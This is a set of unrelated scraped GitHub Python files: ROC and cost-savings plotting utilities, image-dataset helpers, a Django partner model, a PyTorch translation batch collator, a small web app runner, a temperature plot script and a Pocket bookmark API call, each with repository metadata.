te=sem(Ptp,axis=1)[j]*confidence
for i in range(0,Nsets):
ax[0].plot(Pfp[:,i],Ptp[:,i],label='TS%i ($%.3f$)'%(i+1,aucL[i]),
linestyle='--',color='grey')
ax[0].plot(Pfp.mean(axis=1),Ptp.mean(axis=1),label=r'TSM ($%.2f\pm%.3f$)'%(aucM,aucE),
linestyle='-',color='black')
ax[0].legend(loc='lower right')
ax[0].set_ylabel('$p_{tp}$')
ax[0].set_xlabel('$p_{fp}$')
#Annotation Shifts
scalex = 0.03*(1-0)
scaley = 0.03*(np.max(Ptp)-np.min(Ptp))
ax[0].annotate('*',(fm,tm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax[0].annotate('($%.2f \pm %.2f, %.3f \pm %.3f$)'%(fm,fe,tm,te),(fm-scalex,tm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_precision_recall(thL,tprL,PrL,export_fn='./Figures/precision_recall.eps',confidence=1.95):
Nrows,Nsets = tprL.shape #number of columns = number of test sets
aucL = np.zeros((Nsets,1))
for i in range(0,Nsets):
aucL[i]=auc(tprL[:,i], PrL[:,i])
aucM=auc(tprL.mean(axis=1), PrL.mean(axis=1))
aucE=sem(aucL)*confidence
aucL=np.nan_to_num(aucL)
aucM=np.nan_to_num(aucM)
aucE=np.nan_to_num(aucE)
th = 0.5 #threshold for annotation
    i = np.where(np.isclose(thL, th))
pm=PrL.mean(axis=1)[i]
tm=tprL.mean(axis=1)[i]
pe=sem(PrL,axis=1)[i]*confidence
te=sem(tprL,axis=1)[i]*confidence
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,1,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
for i in range(0,Nsets):
ax.plot(tprL[:,i],PrL[:,i],label='TS%i ($%.2f$)'%(i+1,aucL[i]),
linestyle='--',color='grey')
ax.plot(tprL.mean(axis=1),PrL.mean(axis=1),label=r'TSM ($%.2f\pm%.2f$)'%(aucM,aucE),
linestyle='-',color='black')
ax.legend(loc='upper right')
ax.set_ylabel('precision')
ax.set_xlabel('recall (tpr)')
#Annotation Shifts
scalex = 0.03*(1-0)
scaley = 0.03*(np.max(PrL)-np.min(PrL))
ax.annotate('*',(tm,pm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('($%.2f \pm %.2f, %.2f \pm %.2f$)'%(tm,te,pm,pe),(tm-scalex,pm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def compute_savings_variation(thL,Ptp,Pfp,parameters={'Ce':14393,'Cne':5840}):
# Varies eta or prob. of success parameter from 0 to 1
# and intervention costs from $0 to %500 to compute the corresponding
# maximum mean cost savings (csM_maxL) and confidence interval (csE_maxL)
# and the threshold at which this occurs (th_maxL)
etaL = np.arange(0,1.01,0.01)
ciL = np.arange(0,400,1)
Nrows = len(ciL)
Ncols = len(etaL)
csM_maxL = np.zeros((Nrows,Ncols))
csE_maxL = np.zeros((Nrows,Ncols))
th_maxL = np.zeros((Nrows,Ncols))
m = 0
for c in ciL:
n = 0
for e in etaL:
params = {'eta':e,'Ci':c,'Ce':parameters['Ce'],'Cne':parameters['Cne']}
csL,csM,csE = compute_savings(Ptp,Pfp,parameters=params)
j=np.argmax(csM)
csM_maxL[m,n] = csM[j]
csE_maxL[m,n] = csE[j]
th_maxL[m,n] = thL[j]
n+=1
m+=1
return etaL,ciL,th_maxL,csM_maxL,csE_maxL
def plot_parameter_space(thL,Ptp,Pfp,export_fn='./Figures/parameter_space.eps',parameters={'Ce':14393,'Cne':5840}):
etaL,ciL,th_maxL,csM_maxL,csE_maxL = compute_savings_variation(thL,Ptp,Pfp,parameters=parameters)
mineta=np.min(etaL)
maxeta=np.max(etaL)
minci=np.min(ciL)
maxci=np.max(ciL)
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,3,sharex=True,sharey=False,figsize=[15,5])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
c=ax[0].imshow(th_maxL, cmap='gist_stern', interpolation='none', extent=[mineta,maxeta,maxci,minci], aspect='auto')
divider = make_axes_locatable(ax[0])
cax = divider.append_axes("right", size="10%", pad=0.05)
clb=plt.colorbar(c, cax=cax)
clb.set_label('Threshold',rotation=270,labelpad=20)
ax[0].set_ylabel(r'$E(c_i)$')
ax[0].set_xlabel(r'$\eta$')
c=ax[1].imshow(csM_maxL, cmap='gist_stern', interpolation='none', extent=[mineta,maxeta,maxci,minci], aspect='auto')
divider = make_axes_locatable(ax[1])
cax = divider.append_axes("right", size="10%", pad=0.05)
clb=plt.colorbar(c, cax=cax)
clb.set_label(r'$E(c_s)$',rotation=270,labelpad=20)
#ax[1].set_ylabel('E(c_i)')
ax[1].set_xlabel(r'$\eta$')
c=ax[2].imshow(csE_maxL, cmap='gist_stern', interpolation='none', extent=[mineta,maxeta,maxci,minci], aspect='auto')
divider = make_axes_locatable(ax[2])
cax = divider.append_axes("right", size="10%", pad=0.05)
clb=plt.colorbar(c, cax=cax)
clb.set_label(r'$\pm$ 95\% CI',rotation=270,labelpad=20)
#ax[2].set_ylabel('E(c_i)')
ax[2].set_xlabel(r'$\eta$')
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def get_intervention_data():
ci_otago = 339.15
eta_otago = 0.35
ci_tai_chi = 104.02
eta_tai_chi = 0.55
ci_stepping_on = 211.38
eta_stepping_on = .31
eta_ci = {'Otago Exercise':(eta_otago,ci_otago),
'Tai Chi':(eta_tai_chi,ci_tai_chi),
'Stepping On':(eta_stepping_on,ci_stepping_on)}
return eta_ci
def plot_parameter_space_contour(thL,Ptp,Pfp,export_fn='./Figures/parameter_space_contour.eps',parameters={'Ce':14393,'Cne':5840}):
etaL,ciL,th_maxL,csM_maxL,csE_maxL = compute_savings_variation(thL,Ptp,Pfp,parameters=parameters)
mineta=np.min(etaL)
maxeta=np.max(etaL)
minci=np.min(ciL)
maxci=np.max(ciL)
ETA,CI = np.meshgrid(etaL,ciL)
fnt_sz=14; lbl_sz=16; fmt = r'$\$%.f$'
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,3,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
levels = [0,10,20,40,60,80,100]
c=ax[0].contour(ETA,CI,csM_maxL-csE_maxL,interpolation='none',levels=levels,
extent=[mineta,maxeta,maxci,minci],aspect='auto',colors='black')
ax[0].clabel(c,inline=1, fmt=fmt)
ax[0].set_ylabel(r'$E(c_i)$')
ax[0].set_xlabel(r'$\eta$')
ax[0].set_title(r'$E(c_s)$ - 95\% CI')
c=ax[1].contour(ETA,CI,csM_maxL,interpolation='none',levels=levels,
extent=[mineta,maxeta,maxci,minci],aspect='auto',colors='black')
ax[1].clabel(c,inline=1,fmt=fmt)
ax[1].set_ylabel(r'$E(c_i)$')
ax[1].set_xlabel(r'$\eta$')
ax[1].set_title(r'$E(c_s)$')
c=ax[2].contour(ETA,CI,csM_maxL+csE_maxL,interpolation='none',levels=levels,
extent=[mineta,maxeta,maxci,minci],aspect='auto',colors='black')
ax[2].clabel(c,inline=1,fmt=fmt)
ax[2].set_ylabel(r'$E(c_i)$')
ax[2].set_xlabel(r'$\eta$')
ax[2].set_title('$E(c_s)$ + 95\% CI')
#Annotation Shifts
scalex = 0.03*(maxeta-mineta)
scaley = 0.03*(maxci-minci)
eta_ci = get_intervention_data()
for key,value in eta_ci.items():
for i in (0,1,2):
(x,y)=value
ax[i].annotate('*',(x,y),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.4)
ax[i].annotate(r'\textit{'+key+'}',(x-scalex,y-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps',dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_ols_fit(y_pred,y_true,label=['Predicted','Actual'],formula='',table='',export_fn='./Figures/ols_fit.png'):
# Plots actual vs predicted points
# Input is numpy array
rsq = compute_rsq(y_pred,y_true)
miny = np.min([y_pred,y_true])
maxy = np.max([y_pred,y_true])
pady = (maxy-miny)*0.1
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,1,sharex=False,sharey=False,figsize=[10,6])
ax.plot(y_pred,y_true,'.')
ax.set_xlabel('Predicted Weight Change (kg)')
ax.set_ylabel('Actual Weight Change (kg)')
ax.set_ylim([miny-pady,maxy+pady])
ax.set_xlim([miny-pady,maxy+pady])
#ax.set_aspect('equal')
# Plot first-order polynomial to data
fit = np.polyfit(y_pred, y_true, deg=1)
x = np.arange(miny,maxy)
ax.plot(x, fit[0] * x + fit[1],label='actual',
color='lightblue')
# Find limits for expected regression line
lims = [
np.min([ax.get_xlim(), ax.get_ylim()]), # min of both axes
np.max([ax.get_xlim(), ax.get_ylim()]), # max of both axes
]
# Plot expected regression line
ax.plot(lims, lims,label='predicted',
color='lightgray', alpha=0.75, zorder=0)
ax.legend(title=r'Trend ($R^2$=%.3f)'%round(rsq,3),loc='lower right')
# # Add R^2 value:
# pos = [(lims[1]-lims[0])*0.8+lims[0],(lims[1]-lims[0])*0.1+lims[0]]
# ax.annotate('$R^2$=%.2f'%rsq,pos,
# backgroundcolor='white',fontsize=fnt_sz,alpha=0.8)
pos = [(lims[1]-lims[0])*1.05+lims[0],(lims[1]-lims[0])*0.75+lims[0]]
ax.text(pos[0],pos[1],formula)#,
#backgroundcolor='white',fontsize=fnt_sz,alpha=0.8)
pos = [(lims[1]-lims[0])*1.1+lims[0],(lims[1]-lims[0])*0.07+lims[0]]
ax.text(pos[0],pos[1],table,
backgroundcolor='white',fontsize=fnt_sz,alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='png',dpi=500,
facecolor=fig.get_facecolor(), edgecolor='none', bbox_inches='tight')
def param2latex(res):
# This creates a latex table using statsmodels regression results object
coef = res.params.values.tolist() #coefficients
pval = res.pvalues.values.tolist() #their p-values
#95% confidence interval of coefficeints
ci0 = res.conf_int()[0].tolist()
ci1 = res.conf_int()[1].tolist()
ci = [r'%.2f \ \ %.2f'%(ci0[i],ci1[i]) for i in range(0,len(ci0))]
# coef labels
clabel = []
for i in range(0,len(coef)):
clabel.append(r'c_%i'%i)
# create latex table
headers = (r'coef',r'[95.0\% CI]',r'p-value')
table_latex = r"\begin{tabular}{lrrr}"
table_latex += r' & %s & %s & %s '%headers
table_latex += r'\\ \hline '
for i in range(0,len(pval)):
if pval[i]<0.05: #significant
table_latex += r'\\ $%s*$ & %.2f & %s & %.2f'%(clabel[i],coef[i],ci[i],pval[i])
else:
table_latex += r'\\ $%s$ & %.2f & %s & %.2f'%(clabel[i],coef[i],ci[i],pval[i])
table_latex += r'\\ \hline '
table_latex += r'\multicolumn{4}{l}{$*$ statistically significant ($p<0.05$)}'
table_latex += r'\end{tabular}'
return table_latex
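# Hypothetical usage sketch (assumes `res` is a fitted statsmodels OLS result,
# e.g. res = sm.OLS(y, sm.add_constant(X)).fit() with statsmodels imported as sm):
#   table = param2latex(res)
#   plot_ols_fit(y_pred, y_true, table=table)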
| rupndrsingh/predictions-mvc | pLib/rs_model_metrics.py | rs_model_metrics.py | py | 22,722 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pandas.Series",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "pandas.concat",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.classificat... |
38776541163 |
def load_and_display(file_index,mode='both'):
filename = get_image_filename(file_index)
import pickle
import numpy as np
image = pickle.load( open( filename, "rb" ) )
if mode == 'both':
display_image(image)
else:
# Reconstruct the original rgb and depth images from the merged values
import cv2
red, green, blue, depth = cv2.split(image)
if mode == 'rgb':
rgb_image = cv2.merge((red,green,blue))
display_image(rgb_image)
elif mode == 'depth':
depth_image = cv2.merge((depth,depth,depth))
display_image(depth_image)
else:
print('Invalid image display mode. Please select from both, rgb or depth.')
def display_image(image):
from matplotlib import pyplot as plt #note there is an opencv image viewing alternative called imshow and waitkey
fig, ax = plt.subplots()
ax.imshow(image)
plt.show()
def get_image_filename(index):
import os
prefix='image_{}_'.format(index)
prefixed = [filename for filename in os.listdir('dataset') if filename.startswith(prefix)]
if len(prefixed)>0:
return 'dataset/'+prefixed[0]
else:
        raise FileNotFoundError("No filename found with index of {}".format(index))
def save_images(dataset_folder, save_frequency):
print('Saving images')
import cv2
import pickle
import os
# saves all the files in the dataset folder as image files in a different folder
image_folder= 'images/'
# all files
prefix='image_'
prefixed = sorted([filename for filename in os.listdir(dataset_folder) if filename.startswith(prefix)])
# only keep some of the files (at a regular interval)
    sparse_files=[i for i in prefixed if int(i.split('_')[1])%save_frequency==0]
    for image_pickle_file in sparse_files:
image = pickle.load( open( dataset_folder+'/'+image_pickle_file, "rb" ) )
red, green, blue, depth = cv2.split(image)
rgb_image = cv2.merge((red,green,blue))
depth_image = cv2.merge((depth,depth,depth))
image_name = image_pickle_file.replace('.pickle','')
print('saving image {}'.format(image_name))
save_image2(image_folder+'rgb/'+image_name , rgb_image)
save_image2(image_folder+'depth/'+image_name , depth_image)
def save_image(filename,image):
from matplotlib import pyplot as plt
fig, ax = plt.subplots()
ax.imshow(image)
plt.savefig(filename+'.png', bbox_inches='tight')
plt.close()
def save_image2(filename,image):
import cv2
import numpy as np
cv2.imwrite(filename+'.png',image)
def downsize_all(dataset_folder,newfolder,newsize):
import cv2
import pickle
import os
# all files
prefix='image_'
prefixed = sorted([filename for filename in os.listdir(dataset_folder) if filename.startswith(prefix)])
for image_pickle_file in prefixed:
big_image = pickle.load( open( dataset_folder+'/'+image_pickle_file, "rb" ) )
small_image = cv2.resize(big_image,(newsize,newsize))
pickle.dump(small_image,open( newfolder + '/' + image_pickle_file , 'wb' ))
print('resized file: {}'.format(image_pickle_file))
def remove_depth(dataset_folder,newfolder):
import cv2
import pickle
import os
# all files
prefix='image_'
prefixed = sorted([filename for filename in os.listdir(dataset_folder) if filename.startswith(prefix)])
for image_pickle_file in prefixed:
#load files
full_image = pickle.load( open( dataset_folder+'/'+image_pickle_file, "rb" ) )
#split pixels
red, green, blue, depth = cv2.split(full_image)
#create rgb
output_data = cv2.merge((red, green, blue))
#save file
pickle.dump(output_data,open( newfolder + '/' + image_pickle_file , 'wb' ))
print('new rgb only file: {}'.format(image_pickle_file))
# downsize_all('unzipped','small',250)
# remove_depth('small','small_rgb')
save_images('second_dataset',1)
# load_and_display(0)
# load_and_display(0,'rgb')
# load_and_display(0,'depth')
| andrew-houghton/self-driving-donkey-car | Utility code/utilities.py | utilities.py | py | 4,122 | python | en | code | 7 | github-code | 1 | [
{
"api_name": "pickle.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "cv2.split",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.merge",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "cv2.merge",
"line_number": 18,
... |
11981080026 | from decimal import Decimal
from django.db import models
from django_countries.fields import CountryField
class Partner(models.Model):
uid = models.AutoField(primary_key=True)
partner_id = models.CharField(
max_length=3,
unique=True,
error_messages={"unique": "This Partner ID is already in use."},
)
company = models.CharField(max_length=64, unique=True)
contact_name = models.CharField(max_length=64)
contact_email = models.EmailField()
contact_phone = models.CharField(
max_length=16,
blank=True,
help_text="Must have only digits and an optional country code prefixed with a plus sign",
)
address1 = models.CharField(max_length=48, help_text="Street address, P.O. box")
address2 = models.CharField(
max_length=32, blank=True, help_text="Apartment, suite, unit, building, floor"
)
city = models.CharField(max_length=32)
state = models.CharField(
max_length=32, help_text="Should use 2 letter abbreviations for U.S. states"
)
zipcode = models.CharField(max_length=16)
country = CountryField(blank_label="")
notes = models.TextField(blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
ordering = ["company"]
def __str__(self):
return self.company
def get_pretty_contact_phone(self):
if len(self.contact_phone) == 10:
return f"({self.contact_phone[:3]}) {self.contact_phone[3:6]}-{self.contact_phone[6:10]}"
elif len(self.contact_phone) in [12, 13] and self.contact_phone[0] == "+":
return f"{self.contact_phone[:-10]} ({self.contact_phone[-10:-7]}) {self.contact_phone[-7:-4]}-{self.contact_phone[-4:]}"
else:
return self.contact_phone
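    # Example outputs (hypothetical numbers): "4155550123" -> "(415) 555-0123",
    # "+14155550123" -> "+1 (415) 555-0123"; other formats are returned unchanged.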
def get_address1(self):
address = self.address1
if self.address2:
address += ", " + self.address2
return address
def get_address2(self):
address = self.city
address += ", " + self.state
address += " " + self.zipcode
return address
def get_statistics(self):
statistics = {
"non_void_invoices_count": self.invoices.exclude(status=4).count()
}
# The total amount of money this partner has been billed for
statistics["total_billed"] = Decimal("0.00")
for invoice in self.invoices.exclude(status=4).exclude(status=0):
statistics["total_billed"] += invoice.get_total()
return statistics
def get_last_invoice(self):
return self.invoices.exclude(status=4).exclude(status=0).last()
| yezz123/My-Business | partners/models.py | models.py | py | 2,687 | python | en | code | 45 | github-code | 1 | [
{
"api_name": "django.db.models.Model",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.models.AutoField",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "... |
13461593976 | from typing import Dict, List, Union
import numpy as np
import torch
from src.utils.utils import shift_lang_token_right
class BatchCollator:
def __init__(self,
is_mlm: bool = False,
shift_lang_token: bool = False,
return_special_masks: bool = False,
return_lengths: bool = False,
pad_token_id: int = 1) -> None:
"""
Standard collator, its work consists in batching the source and target sentences and creating
the decoder inputs.
:param is_mlm: whether the collator is used for a masked language model (MLM), if False then we're dealing with
a causal model and the labels must be shifted to the right in order to create the decoder inputs
(default=False).
:param shift_lang_token: whether to move the lang token at the beginning of the source sentences
(default=False).
:param return_special_masks: whether to return the special tokens mask for the both input ids and labels
(default=False).
:param pad_token_id: the pad token id (default=1).
"""
self.is_mlm = is_mlm
self.shift_lang_token = shift_lang_token
self.return_special_masks = return_special_masks
self.return_lengths = return_lengths
self.pad_token_id = pad_token_id
def __call__(self, batch) -> Dict[str, Union[torch.Tensor, List[List[str]]]]:
# Put all the tokenized source and target sentences together
src_max_length = 0
tgt_max_length = 0
src_tokenized_sentences = []
tgt_tokenized_sentences = []
input_ids_special_masks = []
labels_special_masks = []
references: List[List[str]] = []
for sentence_pair in batch:
tokenized_src = sentence_pair["input_ids"]
tokenized_tgt = sentence_pair["labels"]
src_tokenized_sentences.append(tokenized_src)
tgt_tokenized_sentences.append(tokenized_tgt)
src_max_length = max(src_max_length, tokenized_src.size(-1))
tgt_max_length = max(tgt_max_length, tokenized_tgt.size(-1))
references.append([sentence_pair["reference"]])
input_ids_special_masks.append(sentence_pair["input_ids_special_mask"])
labels_special_masks.append(sentence_pair["labels_special_mask"])
# Pad the tensors and batchify them
input_ids = [torch.cat([src, src.new(1, src_max_length - src.size(-1)).fill_(self.pad_token_id)], dim=-1)
for src in src_tokenized_sentences]
labels = [torch.cat([tgt, tgt.new(1, tgt_max_length - tgt.size(-1)).fill_(self.pad_token_id)], dim=-1)
for tgt in tgt_tokenized_sentences]
input_ids = torch.stack(input_ids, dim=0).squeeze(1) # (bsz, src_max_length)
labels = torch.stack(labels, dim=0).squeeze(1) # (bsz, tgt_max_length)
# Create decoder input ids
if not self.is_mlm:
if self.shift_lang_token:
# Move the tgt lang token to the first position in a MBart fashion
decoder_input_ids = shift_lang_token_right(labels, self.pad_token_id)
else:
# The usual shift seen for causal language models
decoder_input_ids = labels[:, :-1]
labels = labels[:, 1:]
else:
# This is applied for masked language models such as CMLM
decoder_input_ids = labels.detach().clone()
# Compute the special tokens masks
input_ids_special_mask = None
labels_special_mask = None
if self.return_special_masks or self.return_lengths:
input_ids_special_mask = [torch.cat([mask, mask.new(1, src_max_length - mask.size(-1)).fill_(1)], dim=-1)
for mask in input_ids_special_masks]
input_ids_special_mask = torch.stack(input_ids_special_mask, dim=0).squeeze(1) # (bsz, src_max_length)
labels_special_mask = [torch.cat([mask, mask.new(1, tgt_max_length - mask.size(-1)).fill_(1)], dim=-1)
for mask in labels_special_masks]
labels_special_mask = torch.stack(labels_special_mask, dim=0).squeeze(1) # (bsz, tgt_max_length)
# Compute the source and target lengths, they do not take into account the special tokens
src_lengths = []
tgt_lengths = []
if self.return_lengths:
            src_lengths = torch.sum(input_ids.ne(self.pad_token_id), dim=-1).unsqueeze(-1)  # (bsz, 1)
tgt_lengths = torch.sum(labels_special_mask.ne(1), dim=-1).unsqueeze(-1) # (bsz, 1)
return {"input_ids": input_ids, "labels": labels, "decoder_input_ids": decoder_input_ids,
"input_ids_special_mask": input_ids_special_mask, "labels_special_mask": labels_special_mask,
"references": references, "src_lengths": src_lengths, "tgt_lengths": tgt_lengths}
class BatchCollatorCMLM(BatchCollator):
def __init__(self, pad_token_id: int = 1, mask_token_id: int = 5, train: bool = False) -> None:
"""
Variation of the standard batch collator, used mainly for the CMLM model. At training time, the
decoder inputs (except for special tokens like pad and lang) are masked by a random number in
[1, seq_len - n_special_tokens], the labels are then padded where the masks are placed. At inference time,
all the decoder inputs (except, again, the special tokens) are masked.
:param pad_token_id: the pad token id (default=1).
:param mask_token_id: the mask token id (default=5).
:param train: whether the collator is used during training (default=False).
"""
super().__init__(True, False, True, True, pad_token_id)
# Parameters
self.mask_token_id = mask_token_id
self.train = train
def __mask_target(self,
labels: torch.Tensor,
decoder_input_ids: torch.Tensor,
labels_special_mask: torch.Tensor) -> Dict[str, torch.Tensor]:
batch_size, seq_len = labels.size()
# Compute the number of special tokens for each sentence
n_special_tokens = torch.sum(labels_special_mask, dim=-1)
# At least one token per each sentence should be masked
min_masks = 1
# Keep the indexes of those tokens that can be masked and the number of such tokens
maskable_tokens_idxs = [(mask == 0).nonzero(as_tuple=True)[0].tolist() for mask in labels_special_mask]
n_maskable_tokens = seq_len - n_special_tokens
# Mask tokens loop
if self.train:
# At training time we mask out a number of tokens in [1, seq_len - n_special_tokens] from the decoder inputs
labels = labels.new(batch_size, seq_len).fill_(self.pad_token_id)
np_generator = np.random.default_rng()
for i, max_tokens_to_mask in enumerate(n_maskable_tokens):
if max_tokens_to_mask > 0:
# Sample the number of tokens to mask with a uniform distribution
sample_size = np_generator.integers(min_masks, max_tokens_to_mask + 1)
# Sample the idxs to mask
masks = np_generator.choice(maskable_tokens_idxs[i], sample_size, replace=False)
# Mask the decoder inputs
labels[i, masks] = decoder_input_ids[i, masks]
decoder_input_ids[i, masks] = self.mask_token_id
else:
labels[i] = decoder_input_ids[i]
else:
# At inference time we mask the entire decoder inputs
for i, maskable_tokens in enumerate(maskable_tokens_idxs):
decoder_input_ids[i, maskable_tokens] = self.mask_token_id
return {"labels": labels, "decoder_input_ids": decoder_input_ids}
def __call__(self, batch) -> Dict[str, Union[torch.Tensor, List[List[str]]]]:
tokenized_batch = super().__call__(batch)
input_ids = tokenized_batch["input_ids"]
references = tokenized_batch["references"]
tgt_lengths = tokenized_batch["tgt_lengths"]
masked_target = self.__mask_target(tokenized_batch["labels"], tokenized_batch["decoder_input_ids"],
tokenized_batch["labels_special_mask"])
return {"input_ids": input_ids, "references": references, "labels": masked_target["labels"],
"decoder_input_ids": masked_target["decoder_input_ids"], "tgt_lengths": tgt_lengths}
| RistoAle97/ContinualNAT | src/data/collators.py | collators.py | py | 8,618 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "typing.List",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "torch.cat",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "src.utils.utils",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "src.utils.utils.new",
"line... |
31208597289 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
author comger@gmail.com
"""
import sys
import json
sys.path.append('../../')
from datetime import datetime
from pprint import pprint
from kpages import run
def callback(app):
print("Start time: {0}".format(datetime.now().isoformat(" ")))
print("Config Params")
for k in sorted(app.settings.keys()):
if k.startswith("__"):
continue
print("{0:<40}:{1}".format(k, app.settings[k]))
print("Router Handlers")
for h in app.handlers:
print('{0:<50}:{1}'.format(str(h[1]),str(h[0])))
if __name__ == "__main__":
try:
run(callback)
except KeyboardInterrupt:
print('exit server ')
# vim: ts=4 sw=4 sts=4 expandtab
| comger/kpages | demos/web/apprun.py | apprun.py | py | 748 | python | en | code | 23 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",... |
28541279468 | import csv
import matplotlib.pyplot as plt
'''
Get a list of keys from a dictionary whose value matches the given value
'''
def getKeysByValues(dictOfElements, value):
listOfKeys = list()
listOfItems = dictOfElements.items()
for item in listOfItems:
if item[1] == value:
listOfKeys.append(item[0])
return listOfKeys
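# e.g. getKeysByValues({'a': 1, 'b': 2, 'c': 1}, 1) -> ['a', 'c']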
sem_li = []
with open('temperaturas_2021.csv') as f:
csv_reader = csv.reader(f, delimiter=';')
for row in csv_reader:
sem_li.append(row)
days = {}
for day in sem_li[1:]:
days[day[0]] = (sum([float(temp) for temp in day[1:]])/len(day[1:]))
plt.plot(*zip(*days.items()))
plt.ylabel('Average Temperature')
plt.xlabel('Days')
all_values = days.values()
max_value = max(all_values)
min_value = min(all_values)
for x in getKeysByValues(days , max_value):
plt.plot(x , max_value, marker = 'o')
plt.text(x, max_value , round(max_value , 2) , fontsize=7)
for x in getKeysByValues(days, min_value):
plt.plot(x , min_value, marker = 'o')
plt.text(x, min_value , round(min_value , 2), fontsize=7)
plt.show()
print(days)
| aquarios77/python | 2021-04-08/temp_udz.py | temp_udz.py | py | 1,161 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "csv.reader",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot... |
23463756424 | #!/usr/bin/python3
"""Advanced API.
***This is an advanced task***
For this task, we'll recursively call the Reddit API,
parse the titles of all hot articles and return a sorted
count of given keywords(case-sensitive, delimited by
spaces).
Note:
1. No iteration!
2. If `word_list` contains duplicates, then the sum
of each duplicate should be returned.
3. Considering "java" as the keyword passed:
a. "java java java" counts as 3 separate instances
of "java"
b. "java!", "java_" or "java*" shouldn't count as
"java"
4. If posts don't match or subreddit doesn't exist,
print nothing.
"""
import requests
def count_words(subreddit, word_list=[], word_count={}, after=None):
"""Return the keyword count.
Args:
subreddit ('obj':'str'): The subreddit
word_list ('obj':'list'): The keyword list
word_count ('obj':'dict'): The count dictionary
after ('obj':'None'): The place holder
Returns:
word_list; nothing, otherwise.
"""
url = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)
param = {"after": after}
header = {"User-Agent": "My-User-Agent"}
data = requests.get(
url,
headers=header,
params=param,
allow_redirects=False
)
if data.status_code != 200:
return None
info = data.json()
hot_list = [
c.get("data").get("title") for c in info.get("data")
.get("children")
]
if not hot_list:
return None
word_list = list(dict.fromkeys(word_list))
if word_count == {}:
word_count = {w: 0 for w in word_list}
for title in hot_list:
split_words = title.split(' ')
for word in word_list:
for s_word in split_words:
if s_word.lower() == word.lower():
word_count[word] += 1
if not info.get("data").get("after"):
        # sort alphabetically first so that equal counts keep alphabetical order
        sorted_counts = sorted(word_count.items(), key=lambda kv: kv[0])
        sorted_counts = sorted(sorted_counts,
                               key=lambda kv: kv[1], reverse=True)
[print('{}: {}'.format(k, v)) for k, v in sorted_counts if v != 0]
else:
return count_words(
subreddit,
word_list,
word_count,
info.get("data").get("after")
)
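# Hypothetical invocation (requires network access; subreddit and keywords assumed):
# count_words("programming", ["python", "java", "javascript"])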
| brian-ikiara/alx-system_engineering-devops | 0x16-api_advanced/100-count.py | 100-count.py | py | 2,452 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 42,
"usage_type": "call"
}
] |
10927245542 | import requests
from auth import get_auth_data
from req import consumer_key
auth = get_auth_data()
def add_bookmark(url, title):
res = requests.post("https://getpocket.com/v3/add", json={
"url": url,
"title": title,
"consumer_key": consumer_key,
"access_token": auth["access_token"],
})
if res.status_code == 200:
print("Success!")
else:
print("Error!")
# print(res.content)
| gebeto/python | pocket-py/api.py | api.py | py | 397 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "auth.get_auth_data",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "req.consumer_key",
"line_number": 12,
"usage_type": "name"
